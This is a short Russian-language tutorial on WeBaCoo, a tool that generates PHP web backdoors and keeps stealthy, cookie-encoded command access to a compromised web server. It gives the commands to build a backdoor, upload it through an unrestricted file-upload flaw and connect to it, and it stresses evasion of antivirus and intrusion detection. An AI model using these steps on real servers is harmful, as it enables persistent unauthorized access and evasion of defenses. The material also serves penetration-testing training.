# WeBaCoo — поддерживаем доступ к взломанному веб-серверу

### Что такое WeBaCoo

Web Backdoor Cookie — скрипт веб-бэкдора. Его используют для организации скрытого терминалоподобного соединения между клиентом и веб-сервером по  HTTP. По сути это инструмент пост-эксплойта, который поддерживает доступ к взломанному веб-серверу.

WeBaCoo разработан для работы под радаром современных современных AV, NIDS, IPS, сетевых и прикладных брандмауэров. Он обеспечивает скрытый механизм выполнения системных команд на скомпрометированном сервере.

Главная особенность → соединение между веб-сервером и клиентом кодируется в HTTP-заголовке cookie. Его могут не обнаружить антивирусы, сетевые системы обнаружения/предотвращения вторжений, сетевые и прикладные брандмауэры.

1\. Сначала посмотрим справку:&#x20;

```
webacoo -h
```

<figure><img src="https://telegra.ph/file/eb99a7c8b9be8db72aadf.png" alt=""><figcaption></figcaption></figure>

2\. Теперь воспользуемся WeBaCoo для создания PHP-бэкдора с помощью следующей команды:

```
webacoo -g -o /home/kali/testbackdoor.php
```

В приведенной выше команде: \
`-g` → для создания бэкдора \
`-o` → для задания места вывода. Вы можете выбрать любое место вывода, но мы выбрали домашний каталог (home/kali),  и указали имя выходного файла бэкдора.

3\. Загружаем файл на уязвимый сервер или сайт.&#x20;

Здесь дисклеймер: мы предполагаем, что сервер не имеет мер безопасности, которые определяют необходимые расширения и типы содержимого загружаемых файлов.

Если веб-сервер разрешает, например, файлы текстового или графического типа без каких-либо ограничений, то вредоносный PHP-файл будет пропущен и без проблем запустится как веб-приложение.

4\. Если загрузка прошла успешно → отобразится путь к загруженному файлу.  Этот путь — местоположение загруженного файла и необходим для доступа к полезной нагрузке.

5\. Теперь используем инструмент WeBaCoo для доступа к бэкдору:

```
webacoo -t -u http://127.8.0.1/hackable/uploads/testbackdoor.php
```

Двоеточия (:) в качестве префикса позволяет легко проверить его, выполнив локальные команды на уровне целевой операционной системы.

Загруженные файлы всегда представляют серьезную опасность для веб-приложений. \
\
Первый шаг во многих как раз отправка кода в атакуемую систему, а после поиск возможности выполнения этого кода. Вот как раз использование загрузки файлов может помочь злоумышленнику выполнить первый шаг.

Здесь мы можем использовать WeBaCoo в качестве генератора бэкдоров на системе Kali Linux и для подключения к загруженному бэкдору.

> Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.
